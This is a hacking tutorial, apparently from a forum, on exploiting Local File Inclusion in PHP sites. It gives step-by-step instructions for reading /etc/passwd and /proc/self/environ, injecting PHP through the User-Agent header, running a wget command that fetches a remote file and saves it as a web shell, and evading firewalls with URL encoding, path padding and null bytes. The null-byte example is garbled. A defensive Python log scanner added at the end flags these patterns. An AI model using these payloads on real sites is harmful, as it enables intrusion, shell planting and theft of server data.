Local File Inclusion Shell uploading + WAF bypassing.

Local File Inclusion

Requirements

First of all, check whether the site is vulnerable to including
Quote:etc/passwd
To do that, take a URL such as
Quote:http://www.site.com/index.php?filename=2
Change the number '2' to
Quote:etc/passwd
so it looks like this:
Quote:http://www.site.com/index.php?filename=etc/passwd
If it works, some text from that file will show up on the page.

It will look like this.

Do the same, but change 'etc/passwd' to
Quote:/proc/self/environ

If it works and the file exists, you'll get something similar, but not the same output.

Let's open Tamper Data. To do that, press F10 and do as I did here.

Now, when you have Tamper Data up, it will look similar to this.

Click the 'Start Tamper' button in the top left corner.

Once tampering has started, you will see a window like this.

Change your 'User-Agent' to
Quote:<?php phpinfo();?>
Now refresh the site.

This is how it will look.

Now let us upload our shell.

Start up Tamper Data, then click 'Start Tamper' and go to the 'User-Agent' field again.

Type this into the 'User-Agent' field:
Quote:<?exec('wget http://www.site.com/shell.txt -O shell.php');?>

The site will now download your shell. You can find the shell at website/shell.php
or at
http://www.site.com/index.php?filename=shell.php

There you will find your uploaded shell.



WAF, aka Web Application Firewalls.

Today, I'll show you how to bypass a web application firewall.

First of all, check whether the site is vulnerable to LFI.
In order to do that, change your old vector /etc/passwd to %2fetc%2fpasswd.
Your whole URL, aka 'Uniform Resource Locator', would look like this.
Quote:BeggfomercyIsanoob.com/index.php?filename=%2fetc%2fpasswd.

So basically every '/' is changed to '%2f' (without the quotes).
(/ = %2f) That's a pretty easy form to remember, so keep it in mind.

This method is called 'URL encoding'. It is a simple encoding scheme.
As the name says, it encodes the URL, and it will get past the filters if luck is with you.

To bypass the character limit, you can do it like this.
Quote:/../etc/passwd/./././././././././././././././././././././././././././././
Or much more; it depends on the web server.

Null bytes: this method is pretty easy and can be really useful.
Add this to the end of your URL.
Quote:

For example:
Quote:  .com/index.php?filename=/etc/passwd.
You can even add null bytes instead. This will help you get around the firewalls, but it doesn't always work.

These are just a few methods; many more exist. I might cover them in another tutorial.

This does not cover everything; it's just the basics of WAF bypassing. There might be an error in the tutorial.
If so, please report it to me.
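Every request in the two sections above (the filename parameter pointing at /etc/passwd or /proc/self/environ, the %2f-encoded slashes, the /./ padding, the null byte, and the PHP tag planted in the User-Agent) ends up in the web server's access log. The script below is an added example, not part of the tutorial, showing how a defender can flag those patterns in such a log: the log lines are constructed samples, and the flag names and the double-decode-then-normalize approach are my own choices.

```python
import posixpath
import re
from urllib.parse import unquote, urlsplit

# Constructed sample access-log lines (combined format) mirroring the tutorial's requests; not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?filename=2 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "GET /index.php?filename=etc/passwd HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2023:13:55:44 +0000] "GET /index.php?filename=%2fetc%2fpasswd HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2023:13:55:50 +0000] "GET /index.php?filename=/proc/self/environ HTTP/1.1" 200 2048 "-" "<?php phpinfo();?>"
203.0.113.5 - - [10/Oct/2023:13:55:55 +0000] "GET /index.php?filename=/../etc/passwd/./././. HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2023:13:56:01 +0000] "GET /index.php?filename=/etc/passwd%00.php HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+" \d+ \d+ "[^"]*" "(?P<ua>[^"]*)"')
SENSITIVE_RE = re.compile(r'(^|/)(etc/passwd|proc/self/environ)(/|$)')


def analyze_request(target, user_agent):
    """Return sorted detection flags for one request (empty list if nothing is suspicious)."""
    flags = set()
    for pair in urlsplit(target).query.split("&"):
        raw = pair.partition("=")[2]
        if "%2f" in raw.lower():
            flags.add("encoded_slash")          # the URL-encoding bypass from the WAF section
        value = unquote(unquote(raw))           # decode twice so double-encoded %252f is seen too
        if "\x00" in value:
            flags.add("null_byte")              # truncation trick; keep only the part before it
            value = value.split("\x00", 1)[0]
        if ".." in value.split("/"):
            flags.add("traversal")
        # normpath collapses the /./././ padding and ../ hops, exposing the real target file
        if SENSITIVE_RE.search(posixpath.normpath(value)):
            flags.add("sensitive_path")
    if "<?" in user_agent:
        flags.add("php_tag_in_user_agent")      # PHP code placed in the UA for /proc/self/environ
    return sorted(flags)


def scan_log(text):
    """Return (request target, flags) for every log line that raises at least one flag."""
    hits = []
    for line in text.splitlines():
        match = LOG_RE.search(line)
        if match:
            flags = analyze_request(match["target"], match["ua"])
            if flags:
                hits.append((match["target"], flags))
    return hits
```

Matching on the decoded and normalized path, rather than on the raw query string, is what makes the %2f and /./ variants from the tutorial visible to a filter; the same rule applies to the include code itself, which should resolve the path and check it against an allowlist before opening it.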
